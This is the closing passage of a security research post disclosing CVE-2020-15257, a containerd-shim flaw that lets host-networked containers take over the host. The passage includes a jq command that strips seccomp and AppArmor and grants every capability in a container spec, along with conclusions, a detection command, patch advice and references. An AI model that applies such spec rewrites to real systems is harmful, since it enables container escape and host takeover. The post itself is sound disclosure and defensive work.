jq '. | del(.linux.seccomp) | del(.linux.namespaces[3]) | (.process.apparmorProfile="unconfined")
| (.process.capabilities.bounding=["CAP_CHOWN","CAP_DAC_OVERRIDE","CAP_DAC_READ_SEARCH",
"CAP_FOWNER","CAP_FSETID","CAP_KILL","CAP_SETGID","CAP_SETUID","CAP_SETPCAP",
"CAP_LINUX_IMMUTABLE","CAP_NET_BIND_SERVICE","CAP_NET_BROADCAST","CAP_NET_ADMIN",
"CAP_NET_RAW","CAP_IPC_LOCK","CAP_IPC_OWNER","CAP_SYS_MODULE","CAP_SYS_RAWIO",
"CAP_SYS_CHROOT","CAP_SYS_PTRACE","CAP_SYS_PACCT","CAP_SYS_ADMIN","CAP_SYS_BOOT",
"CAP_SYS_NICE","CAP_SYS_RESOURCE","CAP_SYS_TIME","CAP_SYS_TTY_CONFIG","CAP_MKNOD",
"CAP_LEASE","CAP_AUDIT_WRITE","CAP_AUDIT_CONTROL","CAP_SETFCAP","CAP_MAC_OVERRIDE",
"CAP_MAC_ADMIN","CAP_SYSLOG","CAP_WAKE_ALARM","CAP_BLOCK_SUSPEND","CAP_AUDIT_READ"])
| (.process.capabilities.effective=.process.capabilities.bounding)
| (.process.capabilities.inheritable=.process.capabilities.bounding)
| (.process.capabilities.permitted=.process.capabilities.bounding)'
Conclusions
-
If an attacker can successfully connect to a
containerd-shimsocket, they can directly compromise a host. Prior to the patch for CVE-2020-15257 (fixed in containerd 1.3.9 and 1.4.3, with backport patches provided to distros for 1.2.x), host networking on Docker and Kubernetes (when using Docker or containerd CRI) was root-equivalent. -
Abstract namespace Unix domain sockets can be extremely dangerous when applied to containerized contexts (especially because containers will often share network namespaces with each other).
-
It is unclear how the risks of abstract namespace sockets was not taken into account by the core infrastructure responsible for running the majority of the world’s containers. It is also unclear how this behavior went unnoticed for so long. If anything, it suggests that containerd has not undergone a proper security assessment.
-
Writing exploits to abuse
containerd-shimwas pretty fun. Losing an entire test VM that wasn’t fully backed up due to containerd/runc not bothering to unmount everything beforerm -rfing the supposed “rootfs” was not fun.
Technical Advisory
Our full technical advisory for this issue is available here.14
TL;DR For Users
Assuming there are containers running on a host, the following command can be used to quickly determine if a vulnerable version of containerd is in use.
$ cat /proc/net/unix | grep 'containerd-shim' | grep '@'
If this is the case, avoid using host networked containers that run as the real root user.
Code
So as not to immediately impact users who have not yet been able to update to a patched version of containerd and restart their containers, we will wait until January 11th, 2021 to publish the full exploit code demonstrating the attacks described in this post. Users should keep in mind that the content in this post is sufficient to develop a working exploit, and are implored to apply the patches (and restart their containers) immediately if they have not done so already.
Update (1/12/21): Our exploit code for this issue is now available at https://github.com/nccgroup/abstractshimmer.
-
http://alexander.holbreich.org/docker-components-explained/ ↩
-
https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/client/client.go ↩
-
https://github.com/containerd/containerd/blob/v1.3.0/cmd/containerd-shim/main_unix.go ↩
-
https://github.com/golang/go/blob/a38a917aee626a9b9d5ce2b93964f586bf759ea0/src/syscall/syscall_linux.go#L391 ↩
-
https://github.com/nccgroup/ebpf/blob/9f3459d52729d4cd75095558a59f8f2808036e10/unixdump/unixdump/__init__.py#L77 ↩
-
https://github.com/containerd/containerd/blob/v1.3.0/cmd/containerd-shim/shim_linux.go ↩
-
https://github.com/containerd/ttrpc/blob/v1.0.1/unixcreds_linux.go ↩
-
https://groups.google.com/forum/message/raw?msg=comp.lang.ada/E9bNCvDQ12k/1tezW24ZxdAJ ↩
-
https://github.com/moby/moby/blob/master/profiles/apparmor/template.go ↩
-
https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/v1/shim.proto ↩
-
https://github.com/containerd/containerd/blob/v1.3.0/runtime/v1/shim/service.go#L117 ↩
-
https://github.com/containerd/containerd/blob/v1.3.0/pkg/process/io.go#L79 ↩
-
https://github.com/opencontainers/runtime-spec/blob/master/config.md ↩
-
https://research.nccgroup.com/2020/11/30/technical-advisory-containerd-containerd-shim-api-exposed-to-host-network-containers-cve-2020-15257/ ↩